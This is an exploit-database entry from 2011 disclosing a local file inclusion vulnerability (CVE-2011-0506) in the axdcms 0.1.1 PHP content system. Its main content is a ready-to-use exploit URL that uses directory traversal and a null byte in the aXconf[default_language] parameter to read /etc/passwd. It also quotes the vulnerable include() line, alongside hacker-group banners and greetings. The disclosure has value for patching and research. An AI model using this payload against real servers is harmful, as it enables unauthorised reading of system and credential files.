axdcms-0.1.1 - Local File Inclusion

Author: n0n0x
type: webapps
platform: php
port: 
date_added: 2011-01-08 
date_updated: 2011-01-08 
verified: 1 
codes: CVE-2011-0506;OSVDB-70615 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comaxdcms-0.1.1.zip

###############################################
#          _______         _______
#  _______ __  __ \_______ __  __ \____  __
#  __  _  \_  / / /__  __ \_  / / /__  |/_/
#  _  / / // /_/ / _  / / // /_/ / __>  <
#  /_/ /_/ \____/  /_/ /_/ \____/  /_/|_|
#
# priasantai.uni.cc    |    team-elite.us
###############################################

#######################################################
#
#  axdcms-0.1.1 <=== Local File Include Vulnerbility
#
#######################################################
# Author : n0n0x
#
# Homepage: http://priasantai.uni.cc/
#
# Download script : http://biznetnetworks.dl.sourceforge.net/project/axdcms/axdcms/0.1.1/axdcms-0.1.1.zip
#######################################################


exploit :

http://localhost/www/axdcms-0.1.1/modules/profile/user.php?aXconf[default_language]=../../../../../../../../etc/passwd%00

c0de :

include("modules/profile/lang/".$aXconf['default_language'].".php");


#######################################################
# Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org
#
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
#          devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
#
# chats : irc.auzs.net 6667-7000 #exploit-db
######################################################